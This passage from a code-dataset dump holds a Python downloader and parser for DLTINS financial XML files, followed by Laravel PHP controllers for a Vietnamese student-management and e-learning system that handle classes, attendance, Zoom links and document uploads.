logs.logger().exception(f'{xmlfile} is failed to download.', exc_info=True)\n\n\ndef downloadZipfiles(xmlfile, zippath, logs):\n \"\"\"\"\n This function donwload zip files.\n \"\"\"\n logs.logger().info(f'Starting function : {remove_old_files.__name__} .')\n try:\n xmldoc = ET.parse(xmlfile)\n results = xmldoc.find('result')\n logs.logger().info(f'{xmlfile} is parsed successfully and STRING \"result\" found ')\n except:\n logs.logger().exception(f'{xmlfile} is failed to parse. {xmlfile} is not valid',\n exc_info=True)\n\n for node in results.getiterator():\n for key, value in dict(node.attrib).items():\n if value == 'download_link':\n dltins_url = node.text\n urllist = dltins_url.split('/')\n\n logs.logger().info(f'url : {urllist}')\n for str in urllist:\n if str.startswith('DLTINS'):\n file_name = str\n\n logs.logger().info(f'filename : {file_name}')\n file_path = zippath + file_name\n logs.logger().info(f'file_path : {file_path}')\n\n try:\n response = requests.get(dltins_url)\n logs.logger().info(f'successfully connected : {dltins_url}')\n except:\n logs.logger().exception(f'failed to connect url : {dltins_url} ', exc_info=True)\n try:\n with open(file_path, 'wb') as file:\n file.write(response.content)\n logs.logger().info(f'{file_path} is downloaded successfully.')\n except:\n logs.logger().exception(f'{file_path} is failed to download.', exc_info=True)\n\n\ndef unzipdownload(zippath, dltinspath, logs):\n \"\"\"\"\n It extract zipped files which creates data xml files.\n \"\"\"\n logs.logger().info(f'Starting function : {remove_old_files.__name__} .')\n for filename in os.listdir(zippath):\n if filename.endswith(\".zip\"):\n\n if os.path.isdir(dltinspath):\n try:\n zipped = zipfile.ZipFile(zippath + filename)\n zipped.extractall(path=dltinspath)\n logs.logger().info(f'{zipped} file is extracted successfully.')\n except zipfile.BadZipfile as e:\n logs.logger().exception(f'{filename} is BAD ZIPPED.', exc_info=True)\n try:\n os.remove(filename)\n logs.logger().info(f'{filename} file is removed successfully.')\n except OSError as e:\n logs.logger().exception(f'{e} is OS Error.', exc_info=True)\n" }, { "alpha_fraction": 0.531733512878418, "alphanum_fraction": 0.5333122611045837, "avg_line_length": 41.22666549682617, "blob_id": "2328e794bf7b173baa4c041822c357c41fa6247d", "content_id": "a3ad5fcbce5b51007e034a3a17f00d6700c36b30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3167, "license_type": "no_license", "max_line_length": 101, "num_lines": 75, "path": "/xml_data_processing/xmlfileProcessingService.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import csv\nimport xml.etree.ElementTree as ET\n\n\ndef xmlfileprocessing(dltinsfile, logs):\n \"\"\"\"\n This function process unzipped xml files to extract required data and put in list.\n \"\"\"\n try:\n dltinsTree = ET.parse(dltinsfile)\n dltinsRoot = dltinsTree.getroot()\n getDoc = ET.ElementTree(dltinsRoot)\n logs.logger().info(f'{dltinsfile} is parsed successfully and started processing .........')\n except:\n logs.logger().exception(f'{dltinsfile} is failed to parse. {dltinsfile} is not valid',\n exc_info=True)\n dict_list = []\n logs.logger().info(f'{dict_list} : list is initialized')\n\n try:\n for TermntdRcrd in getDoc.iter():\n\n rec_dict = {}\n if str(TermntdRcrd.tag).split('}')[1] == 'TermntdRcrd':\n\n # logs.logger().info(f'TermntdRcrd : {TermntdRcrd}')\n\n for rec_attrib in TermntdRcrd:\n\n if str(rec_attrib.tag).split('}')[1] == 'FinInstrmGnlAttrbts':\n\n for FinInstrmGnlAttrbts in rec_attrib.iter():\n\n dict_key = str(FinInstrmGnlAttrbts.tag).split('}')[1]\n if dict_key != 'FinInstrmGnlAttrbts':\n\n if dict_key == 'Id':\n rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n elif dict_key == 'FullNm':\n rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n elif dict_key == 'ClssfctnTp':\n rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n elif dict_key == 'CmmdtyDerivInd':\n rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n elif dict_key == 'NtnlCcy':\n rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n\n if str(rec_attrib.tag).split('}')[1] == 'Issr':\n rec_dict['Issr'] = rec_attrib.text\n\n dict_list.append(rec_dict)\n logs.logger().info(f'{dltinsfile} is processed successfully')\n except:\n logs.logger().exception(f'{dltinsfile} is not processed successfully.', exc_info=True)\n\n return dict_list\n\n\ndef saveDictiornarytoCSV(rec_dict, dataCSV, headerFlag, logs):\n \"\"\"\"\n This function save dict_list data in a csv file.\n \"\"\"\n schema = ['Id', 'FullNm', 'ClssfctnTp', 'CmmdtyDerivInd', 'NtnlCcy', 'Issr']\n logs.logger().info(f'CSV file Schemalist : {schema}')\n try:\n with open(dataCSV, 'a+', encoding='utf-8', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=schema)\n logs.logger().info(f'{csvfile} is opened ... ')\n if headerFlag:\n writer.writeheader()\n logs.logger().info(f'Header Record is written : {schema}')\n writer.writerows(rec_dict)\n logs.logger().info(f'Dictionary List written in file : {csvfile}')\n except:\n logs.logger().exception(f'{csvfile} is not written successfully.', exc_info=True)\n" } ]
5
HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing
https://github.com/HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing
6bffe5efd9119061f6789ea3c46543f8c50957cd
d4531c7fee9bf0a5de855b44295ea9bf286476fa
455dfcd08daf852bc4c40d78a8c3d849cb6c253a
refs/heads/main
2023-05-23T02:45:56.915903
2021-06-18T10:15:48
2021-06-18T10:15:48
368,124,220
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6721854209899902, "alphanum_fraction": 0.6754966974258423, "avg_line_length": 17.875, "blob_id": "943b47cbce26f3e9dfefa16a30d8fb02c848302f", "content_id": "7dd4a72a75e056a4a1045dd322cb461f2fa7c123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 302, "license_type": "no_license", "max_line_length": 54, "num_lines": 16, "path": "/app/Models/GiangVien.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Models;\n\nuse Illuminate\\Database\\Eloquent\\Factories\\HasFactory;\nuse Illuminate\\Database\\Eloquent\\Model;\n\nclass GiangVien extends Model\n{\n use HasFactory;\n protected $table='users';\n protected $attributes=[\n 'level'=>2,\n 'anh'=>'img/avata_user.png',\n ];\n}\n" }, { "alpha_fraction": 0.6270492076873779, "alphanum_fraction": 0.6270492076873779, "avg_line_length": 36.53845977783203, "blob_id": "0a12eefdaf402ab90710705453a1f664fc2adfa0", "content_id": "5aac2f993f0ee2affa0827a2a0a762999d80c52f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 108, "num_lines": 52, "path": "/app/Http/Controllers/ZoomController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\ZoomRoom;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass ZoomController extends Controller\n{\n // public function __construct(){\n // $this->middleware('giang-vien');\n // }\n //\n public function indexOnlineClass($malop){\n $lopHoc=LopHoc::find($malop);\n $zoomClass =DB::table('zoom_rooms')->where('ma_lop',$malop)->first();\n return view('onlineClass',['lopHoc'=>$lopHoc,'zoomClass'=>$zoomClass]);\n }\n public function createZoomCLassForm($malop){\n $lopHoc=LopHoc::find($malop);\n return view('giang-vien.formCreateZoom',['lopHoc'=>$lopHoc]);\n }\n public function createZoomClass(Request $request){\n $zoomClass=new ZoomRoom();\n $zoomClass->ma_lop=$request->ma_lop;\n $zoomClass->link_zoom=$request->link_zoom;\n $zoomClass->save();\n $msg =\"thêm thành công\";\n return redirect(route('giangvien.taoZoomClass',['malop'=>$request->ma_lop]))->with('msg',$msg);\n }\n public function editZoomClass(Request $request){\n $zoomClass=ZoomRoom::where('ma_lop',$request->ma_lop)->first();\n $zoomClass->ma_lop=$request->ma_lop;\n $zoomClass->link_zoom=$request->link_zoom;\n $zoomClass->save();\n $msg =\"sửa thành công\";\n return redirect(route('giangvien.editZoomClassForm',['malop'=>$request->ma_lop]))->with('msg',$msg);\n }\n public function editZoomClassForm($malop){\n $lopHoc=LopHoc::find($malop);\n $zoomClass=DB::table('zoom_rooms')->where('ma_lop',$malop)->first();\n return view('giang-vien.formEditZoom',['lopHoc'=>$lopHoc,'zoomClass'=>$zoomClass]);\n }\n public function deleteZoomClass($id){\n $zoomClass=ZoomRoom::findOrFail($id);\n $malop=$zoomClass->ma_lop;\n $zoomClass->delete();\n return redirect(route('user.viewOnlineClass',['malop'=>$malop]));\n }\n}\n" }, { "alpha_fraction": 0.489130437374115, "alphanum_fraction": 0.532608687877655, "avg_line_length": 22, "blob_id": "b659ad6e7ef1293e7d0ccb46ab555931632deefa", "content_id": "18827b703955040e0e14f3824c066217a0285696", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, "license_type": "no_license", "max_line_length": 50, "num_lines": 4, "path": "/public/test.py", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "a = 5\nb = 6\nprint('<h2>DAMMIO.COM</h2>')\nprint('<b>Ket qua a + b bang Python:</b> ', a + b)\n" }, { "alpha_fraction": 0.5349861979484558, "alphanum_fraction": 0.5385674834251404, "avg_line_length": 34.94059371948242, "blob_id": "835f98964d111e16c0e03ef4502f0cded5164876", "content_id": "9393c6ff5bb8e22f9432b9f91294c1f149bf5453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3644, "license_type": "no_license", "max_line_length": 115, "num_lines": 101, "path": "/app/Http/Controllers/NguoiDungController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangDay;\nuse App\\Models\\GiangVien;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass NguoiDungController extends Controller\n{\n public function __construct(){\n $this->middleware('auth');\n }\n\n public function xemThongTinNguoiDung($id)\n {\n $nguoidung = GiangVien::where('id', $id)->first();\n return view('user.thongTinNguoiDung', ['nguoidung' => $nguoidung]);\n }\n\n public function createFormSuaThongTin($id)\n {\n $nguoidung = GiangVien::where('id', $id)->first();\n return view('user.suaThongTin', ['nguoidung' => $nguoidung]);\n }\n\n public function suaThongTinCaNhan(Request $request, $id)\n {\n try {\n $nguoidung = GiangVien::where('id', $id)->first();\n $nguoidung->name = \\request('name');\n $nguoidung->email = \\request('email');\n $time1 = explode(\"/\", \\request('ngay_sinh'));\n $ngaysinh = $time1[2] . '-' . $time1[1] . '-' . $time1[0];\n $nguoidung->ngay_sinh = $ngaysinh;\n $get_image = $request->file('anh');\n if ($get_image) {\n $new_image = \\request('name') . '-' . rand(0, 99) . '.' . $get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien', $new_image);\n $nguoidung->anh = \"upload/giangVien/$new_image\";\n } else {\n if (!$nguoidung->anh) {\n $nguoidung->anh = 'img/user-alt-512.png';\n }\n }\n if (\\request('password')) {\n\n $nguoidung->password = Hash::make(\\request('password'));\n }\n// luu ket qua\n $nguoidung->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('user/sua-thong-tin/' . $id)->with('msg_edit', $msg_edit);\n }\n\n public function xemDSLopHoc($id)\n {\n $lophoc=DB::table('lop_hoc')->where('magv',$id)->get();\n return view('giang-vien.xemDSLop',['lophoc'=>$lophoc]);\n }\n public function xemChiTietlop($malop){\n $dssv=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->where('ma_lop',$malop)\n ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n ->get();\n return view('giang-vien.chiTietLopHoc',['dssv'=>$dssv]);\n }\n public function formCapNhapDiemCC($malop,$masv){\n $sinhvien=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->where('ma_lop',$malop)\n ->where('masv',$masv)\n ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n ->first();\n\n return view('giang-vien.suadiemccSV',['sinhvien'=>$sinhvien]);\n }\n public function capNhapDiemCC($malop,$masv){\n $giangday=GiangDay::where('masv',$masv)\n ->where('ma_lop',$malop)\n ->first();\n $giangday->diemcc=\\request('diemcc');\n $giangday->save();\n// $dssv=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n// ->where('ma_lop',$malop)\n// ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n// ->get();\n return redirect('user/xem-chi-tiet-lop-hoc/'.$malop);\n\n\n }\n public function formChinhSuaDiemCC($masv){\n $sinhvien= GiangDay::where('masv',$masv)->first();\n return view('giang-vien.chinhSuaDiemSV',['sinhvien'=>$sinhvien]);\n\n }\n}\n" }, { "alpha_fraction": 0.5592665076255798, "alphanum_fraction": 0.5599214434623718, "avg_line_length": 29.540000915527344, "blob_id": "5924c925f5d1fba2ea209264635e358211a2e5f4", "content_id": "1942dc4cc0020c8222a097cf45f0e15c7f364559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1548, "license_type": "no_license", "max_line_length": 84, "num_lines": 50, "path": "/app/Http/Controllers/GiangDayController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangDay;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass GiangDayController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showGiangDay(){\n $giangday=DB::table('diem_danh')\n ->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->join('lop_hoc','diem_danh.ma_lop','=','lop_hoc.id')\n ->select('diem_danh.*','sinh_vien.name','lop_hoc.ten_lop')\n ->get();\n error_log($giangday);\n $lophoc=SubjectClass::all();\n return view('admin.showGiangDay',['giangday'=>$giangday,'lophoc'=>$lophoc]);\n }\n public function saveGiangDay(){\n try{\n $giangday=new GiangDay();\n $giangday->masv=\\request('masv');\n $giangday->ma_lop=\\request('ma_lop');\n $giangday->save();\n $msg_error='';\n }catch (\\Exception $e){\n $msg_error=\"có lỗi xảy ra, vui lòng thử lại\";\n }\n\n return redirect('admin/show-giang-day')->with('msg_error',$msg_error);\n }\n public function xoaGiangDay($id){\n try {\n $giangday = GiangDay::findOrFail($id);\n $giangday->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-giang-day')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.5783653855323792, "alphanum_fraction": 0.5783653855323792, "avg_line_length": 32.54838562011719, "blob_id": "d1d24a3d60fe6e3cc5aa189401206677873742e6", "content_id": "e6c4593383cacb9d05b08a92a114de252b9a01b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2095, "license_type": "no_license", "max_line_length": 83, "num_lines": 62, "path": "/app/Http/Controllers/DocumentController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n//above in controller. có dòng này vscode mới có thể truy cập được vào webpatser\nuse Illuminate\\Support\\Str;\nuse App\\Models\\Document;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\nuse Webpatser\\Uuid\\Uuid;\n\nclass DocumentController extends Controller\n{\n //\n public function __construct(){\n $this->middleware('auth');\n }\n\n public function index($malop)\n {\n $lophoc=DB::table('lop_hoc')\n ->join('mon_hoc','mon_hoc.id','=','lop_hoc.monhoc_id')\n ->select('lop_hoc.*','mon_hoc.tenmh')\n ->where('lop_hoc.id',$malop)\n ->first();\n $documents=DB::table('documents')\n ->join('users','users.id','=','documents.user_id')\n ->select('documents.*','users.name')\n ->where('malop','=',$malop)\n ->get();\n return view('documents.index',['documents'=>$documents,'lopHoc'=>$lophoc]);\n // return view('documents.index');\n }\n\n public function create($malop)\n {\n $lophoc=DB::table('lop_hoc')\n ->join('mon_hoc','mon_hoc.id','=','lop_hoc.monhoc_id')\n ->select('lop_hoc.*','mon_hoc.tenmh')\n ->where('lop_hoc.id',$malop)\n ->first();\n return view('documents.create',['lopHoc'=>$lophoc]);\n }\n public function store(Request $request)\n {\n $document = $request->all();\n $document['uuid'] = (string)Uuid::generate();\n if ($request->hasFile('cover')) {\n $document['malop']=$request->malop;\n $document['user_id']=$request->user_id;\n $document['cover'] = $request->cover->getClientOriginalName();\n $request->cover->storeAs('documents', $document['cover']);\n }\n Document::create($document);\n return redirect()->route('documents.index',['malop'=>$request->malop]);\n }\n public function download($uuid)\n {\n $document = Document::where('uuid', $uuid)->firstOrFail();\n $pathToFile = storage_path('app/documents/' . $document->cover);\n return response()->download($pathToFile);\n }\n}\n" }, { "alpha_fraction": 0.5092121958732605, "alphanum_fraction": 0.5196950435638428, "avg_line_length": 32.1368408203125, "blob_id": "577e138d41bf264279ec7c48064d1fa5b1c32530", "content_id": "72017a7a45e49c50fee3f922b15b59f587e02588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3186, "license_type": "no_license", "max_line_length": 86, "num_lines": 95, "path": "/app/Http/Controllers/SubjectClassController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\n\nuse App\\Models\\GiangVien;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass SubjectClassController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showLopHoc()\n {\n $lophoc = DB::table('lop_hoc')\n ->join('users','lop_hoc.magv','=','users.id')\n ->select('lop_hoc.*','users.name')->get();\n error_log($lophoc);\n return view('admin.showLopHoc', ['lophoc' => $lophoc]);\n }\n\n public function createLopHoc()\n {\n $giangvien=GiangVien::all();\n return view('admin.themLopHoc',['giangvien'=>$giangvien]);\n }\n\n public function saveLopHoc()\n {\n try {\n $lophoc = new SubjectClass();\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv=\\request('magv');\n// $time1=strtotime(\\request('ngay_bat_dau'));\n// $ngay_bat_dau=date('Y-m-d',$time1);\n// $time2=strtotime(\\request('ngay_ket_thuc'));\n// $ngay_ket_thuc=date('Y-m-d',$time2);\n $time1=explode(\"/\",\\request('ngay_bat_dau'));\n $ngay_bat_dau=$time1[2].'-'.$time1[1].'-'.$time1[0];\n $lophoc->ngay_bat_dau=$ngay_bat_dau;\n $time2=explode(\"/\",\\request('ngay_ket_thuc'));\n $ngay_ket_thuc=$time2[2].'-'.$time2[1].'-'.$time2[0];\n $lophoc->ngay_ket_thuc=$ngay_ket_thuc;\n $lophoc->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-lop-hoc')->with('msg', $msg);\n }\n\n public function suaLopHoc($id)\n {\n $lophoc = SubjectClass::where('id', $id)->first();\n $giangvien=GiangVien::all();\n return view('admin.suaLopHoc', ['lophoc' => $lophoc,'giangvien'=>$giangvien]);\n }\n\n public function editLopHoc($id)\n {\n try {\n $lophoc = SubjectClass::where('id', $id)->first();\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv=\\request('magv');\n $time1=explode(\"/\",\\request('ngay_bat_dau'));\n $ngay_bat_dau=$time1[2].'-'.$time1[1].'-'.$time1[0];\n $lophoc->ngay_bat_dau=$ngay_bat_dau;\n $time2=explode(\"/\",\\request('ngay_ket_thuc'));\n $ngay_ket_thuc=$time2[2].'-'.$time2[1].'-'.$time2[0];\n $lophoc->ngay_ket_thuc=$ngay_ket_thuc;\n $lophoc->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-lop-hoc/' . $id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaLopHoc($id)\n {\n try {\n $lophoc = SubjectClass::findOrFail($id);\n $lophoc->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-lop-hoc')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.5515021681785583, "alphanum_fraction": 0.5515021681785583, "avg_line_length": 24.189189910888672, "blob_id": "aa0b1ab936a0e2448353a2a2fef80a68c86a53f7", "content_id": "4df77dd85b657e96643bf73ed89419f42a520da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 932, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/database/migrations/2021_04_22_164430_create_lop_hoc_table.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateLopHocTable extends Migration\n{\n /**\n * Run the migrations.\n *\n * @return void\n */\n public function up()\n {\n Schema::create('lop_hoc', function (Blueprint $table) {\n $table->id();\n $table->unsignedBigInteger('monhoc_id');\n $table->foreign('monhoc_id')->references('id')->on('mon_hoc');\n $table->unsignedBigInteger('magv');\n $table->foreign('magv')->references('id')->on('users');\n $table->date('ngay_bat_dau')->nullable();\n $table->date('ngay_ket_thuc')->nullable();\n $table->timestamps();\n });\n }\n\n /**\n * Reverse the migrations.\n *\n * @return void\n */\n public function down()\n {\n Schema::dropIfExists('lop_hoc');\n }\n}\n" }, { "alpha_fraction": 0.49939197301864624, "alphanum_fraction": 0.5034455060958862, "avg_line_length": 29.456790924072266, "blob_id": "ca227e68a4649915d48b375f28080d9965a6e8a8", "content_id": "55b945accb30c07487bad3f1d02c2b2f5d38faf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2467, "license_type": "no_license", "max_line_length": 141, "num_lines": 81, "path": "/app/Http/Controllers/DiemDanhController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\SinhVien;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\n\nclass DiemDanhController extends Controller\n{\n public function kTraDiemDanh($masv, $dssv)\n {\n\n// print_r($dssv);\n foreach ($dssv as $item) {\n $sinhvien = explode(\"-\", $item);\n if ($masv == $sinhvien[1]) {\n $kiemtra = 0;\n break;\n } else {\n $kiemtra = 1;\n }\n }\n return $kiemtra;\n }\n\n public function ghiThongTinDiemDanh($malop)\n {\n $file = \"Cap/diemdanhsv.txt\";\n $handle = fopen($file, 'r');\n// fclose($handle);\n $masv = fread($handle, filesize($file));\n $sinhvien = SinhVien::where('id', (int)$masv)->first();\n $lophoc = SubjectClass::where('id', (int)$malop)->first();\n $fileName = 'dsdiemdanh/' . $lophoc->ten_lop . ' ' . date(\"d-m-Y\") . '.txt';\n $file = fopen($fileName, 'a');\n// if ($this->kTraDiemDanh($masv, $fileName) == 1) {\n fwrite($file,(string)$sinhvien->id . '-' . (string)$sinhvien->name . '-' .(string)$lophoc->ten_lop.'-'. date(\"d/m/Y-h:i:sa\") . \"\\n\");\n fclose($file);\n fclose($handle);\n// }\n return view('thongTinDiemDanh', ['sinhvien' => $sinhvien]);\n\n }\n\n public function createFormDiemDanh($malop)\n {\n $lophoc=LopHoc::where('id',$malop)->first();\n return view('diemdanh2',['lophoc' => $lophoc]);\n }\n\n public function xemKQDiemDanh($malop)\n {\n $lophoc = SubjectClass::where('id', (int)$malop)->first();\n $fileName = 'dsdiemdanh/' . $lophoc->ten_lop . ' ' . date(\"d-m-Y\") . '.txt';\n $dssv = [];\n $mssv=[];\n $handle = fopen($fileName, 'r');\n $content = fread($handle, filesize($fileName));\n fclose($handle);\n $dssv = explode(\"\\n\", $content);\n $dssv_diem_danh=[];\n // $n=(int)count($dssv);\n // print_r($dssv);\n foreach($dssv as $item){\n $sinhvien=explode(\"-\",$item);\n if(!in_array($sinhvien[0],$mssv)){\n array_push($mssv,$sinhvien[0]);\n array_push($dssv_diem_danh,$item);\n }\n }\n // print_r($dssv_diem_danh);\n // echo $dssv[0];\n // $sinhvien=explode(\"-\",$dssv[3]);\n // echo $sinhvien[1];\n return view('ketQuaDiemDanh',['dssv'=>$dssv_diem_danh]);\n\n }\n\n}\n" }, { "alpha_fraction": 0.4926871955394745, "alphanum_fraction": 0.49617987871170044, "avg_line_length": 32.93333435058594, "blob_id": "74485cdfffdb511101ba934158486314b66650d9", "content_id": "3be929c4d39863a5a444c13ef94fe968067370f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 4650, "license_type": "no_license", "max_line_length": 115, "num_lines": 135, "path": "/app/Http/Controllers/LopHocController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\MonHoc;\nuse App\\Models\\SinhVienLopHoc;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass LopHocController extends Controller\n{\n //\n public function __construct()\n {\n $this->middleware('auth');\n }\n\n public function ViewDangKiMoLop()\n {\n $mon_hoc = MonHoc::all();\n return view('giang-vien.dangKiMoLop', ['mon_hoc' => $mon_hoc]);\n }\n\n public function kiemTraTenLop($tenlop)\n {\n $DSTenLop = DB::select('select * from lop_hoc where ten_lop = ?', [$tenlop]);\n if ($DSTenLop) {\n return false;\n } else {\n return true;\n }\n }\n public function danhSachLopHoc($magv)\n {\n $dsLopHoc = DB::table('lop_hoc')\n ->where('magv', '=', $magv)\n ->get();\n return view('giang-vien.danhSachLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n public function danhSachLopHocHocVien($masv)\n {\n $dsLopHoc = DB::table('dssv_lop_hoc')\n ->join('lop_hoc', 'lop_hoc.id', '=', 'dssv_lop_hoc.malop')\n ->select('dssv_lop_hoc.*', 'lop_hoc.ten_lop')\n ->where('dssv_lop_hoc.masv', '=', $masv)\n ->get();\n return view('hoc-vien.dsLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n\n public function saveLopHoc(Request $request)\n {\n try {\n $ten_lop = \\request('ten_lop');\n $lophoc = new LopHoc();\n if ($this->kiemTraTenLop($ten_lop)) {\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv = \\request('magv');\n $lophoc->monhoc_id = \\request('monhoc_id');\n $time1 = explode(\"/\", \\request('ngay_bat_dau'));\n $ngay_bat_dau = $time1[2] . '-' . $time1[1] . '-' . $time1[0];\n $lophoc->ngay_bat_dau = $ngay_bat_dau;\n $time2 = explode(\"/\", \\request('ngay_ket_thuc'));\n $ngay_ket_thuc = $time2[2] . '-' . $time2[1] . '-' . $time2[0];\n $lophoc->ngay_ket_thuc = $ngay_ket_thuc;\n $lophoc->save();\n $msg = \"thêm thành công\";\n } else {\n $msg = 'tên lớp bị trùng';\n }\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('giangvien/dang-ki-mo-lop')->with('msg', $msg);\n }\n public function viewChiTietLopHoc($malop)\n {\n $lopHoc = DB::table('lop_hoc')\n ->join('mon_hoc', 'lop_hoc.monhoc_id', '=', 'mon_hoc.id')\n ->where('lop_hoc.id', '=', $malop)\n ->select('lop_hoc.*', 'mon_hoc.mamh', 'mon_hoc.tenmh', 'mon_hoc.mota')\n ->first();\n\n return view('chiTietLopHoc', ['lopHoc' => $lopHoc]);\n }\n public function viewDangKiLopHoc()\n {\n $dsLopHoc = LopHoc::all();\n return view('hoc-vien.dangKiLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n public function dangKiLopHoc(Request $request)\n {\n\n $masv = $request->masv;\n $malop = $request->malop;\n if ($this->kiemTraDKLopHoc($masv, $malop)) {\n $hocVienDaDK = new SinhVienLopHoc();\n $hocVienDaDK->masv = $request->masv;\n $hocVienDaDK->malop = $request->malop;\n $hocVienDaDK->save();\n $msg = \"đăng kí lớp thành công\";\n } else {\n $msg = \"Bạn đã đăng kí lớp này rồi\";\n }\n\n return redirect(route('hocvien.viewDangKiLopHoc'))->with('msg', $msg);\n }\n public function kiemTraDKLopHoc($masv, $malop)\n {\n // $result=DB::table('dssv_lop_hoc')\n // ->where('masv','=',$masv)\n // ->where('malop','=',$malop)\n // ->get();\n // lưu ý: không dùng được BD:table vì nó trả về kiểu dữ liệu k phải mảng nên k thể xét đc result rỗng hay k\n $result = DB::select('select * from dssv_lop_hoc where masv = ? and malop = ?', [$masv, $malop]);\n print_r($result);\n if ($result) {\n return 0;\n } else 